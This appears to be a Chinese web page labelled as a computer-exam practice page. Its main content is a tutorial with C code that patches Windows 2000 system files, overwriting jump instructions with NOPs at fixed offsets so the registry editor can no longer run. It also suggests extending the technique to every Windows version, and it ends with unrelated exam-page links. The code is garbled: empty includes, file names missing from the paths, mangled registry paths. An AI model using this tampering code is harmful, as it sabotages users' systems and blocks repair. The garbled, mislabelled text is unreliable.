2016最新计算机二级考试操作题
你有没有遇到注册表被锁定,无法打开注册表来手工修复呢?很多人都为这个头疼吧,相信你被锁定一次就知道他的操作原理了:
修改[HKEY_CURRENT_USERSoftware
MicrosoftWindowsCurrent
VersionPolicIEsSystem]下的DisableRegistryTools值为1
解锁的方法也有几种,比如程序用API函数调用注册表直接删除,做一个REG文件直接导入,写一个脚本…………
今天我就教大家写个程序来实现另类锁定,是不是很好奇了?跟我来。
实验环境:Windows2000
实验目的`:锁定注册表(本方法利用了Cracker的思路来实现,直接让程序修改程序指令,使调用注册表程序禁止。)
实现方法:C程序
首先我们要按照Cracker的思路反汇编WINNT下的和找到跳转指令,怎么得到这些信息不是我们今天的目的,这里我就不详细介绍了,以下是我反汇编找到的跳转地址:
偏移地址:0x69CA 将指令:0x74 0x1A 修改成:0x90 0x90
偏移地址:0x10bf2 将指令:0x74 0x52 修改成:0x90 0x90
现在我们用程序把这2个偏移地址的指令给修改成0x90 0x90 ( 0x90代表nop,就是让程序什么也不做,执行下一条指令)让我们看看程序是如何实现的吧。
#include
#include
bool scanreg(const char *file,long offset, int length,char *the);
main()
{
char the[]={ 0x90,0x90 };
scanreg("C:\WINNT\",0x69CA,0x02,the);
scanreg("C:\WINNT\ServicePackFiles\i386\",0x69CA,0x02,the);
scanreg("C:\WINNT\system32\",0x10bf2,0x02,the);
scanreg("C:\WINNT\ServicePackFiles\i386\",0x10bf2,0x02,the);
}
bool scanreg(const char *file,long offset, int length,char *the)
{
FILE *fp = NULL;
bool result=false;
if((fp=fopen(file,"rb+"))!=NULL)
{
fseek(fp,offset,1);
fwrite(the,length,1,fp);
fclose(fp);
result=true;
}
return(result);
}
好了,我这里只是一个示范,只适合2000系统,把windows每种系统的注册表调用程序都分析一下,然后在程序开始用API函数GetVersionEx(LPOSVERSIONINFO lpVersionInfo)判断系统,根据判断的系统来调用相应的修改函数。那不是通杀windows了?上面把方法公布出来,以便大家做好防范。
-
计算机二级《Access》考前冲刺题及答案
计算机二级考试是全国计算机等级考试(NationalComputerRankExamination,简称NCRE)四个等级中的一个等级,由教育部考试中心主办,考核计算机基础知识和使用一种高级计算机语言编写程序以及上机调试的基本技能。下面是小编整理的计算机二级《Access》考前冲刺题及答案,...
-
计算机二级考试VFP测试题
VFP是Microsoft公司推出的最新可视化数据库管理系统平台,是功能特别强大的32位数据库管理系统。下面是小编分享的计算机二级考试VFP测试题,一起来看一下吧。一、单选题1).在文件系统阶段,操作系统管理数据的基本单位是()A.记录B.程序C.数据项D.文件正确答案:D2).在...
-
2021计算机二级《VB》上机操作题与答案解析
VisualBasic是一种由微软公司开发的结构化的、模块化的、面向对象的、包含协助开发环境的事件驱动为机制的可视化程序设计语言。以下是本站小编搜索整理的一份2017计算机二级《VB》上机操作题与答案解析,供参考练习,希望对大家有所帮助!想了解更多相关信息请持续...
-
2017年9月全国计算机等级二级公共基础知识训练试题
2017计算机二级考试将要到来,不放过每一个知识点,尤其对容易混淆的东西要下更大工夫搞清楚,基础要牢固。下面是小编分享的2017年9月全国计算机等级二级公共基础知识训练试题,大家快来练习下!(1)在下列选项中,哪个不是一个算法一般应该具有的基本特征______。(C)A.确...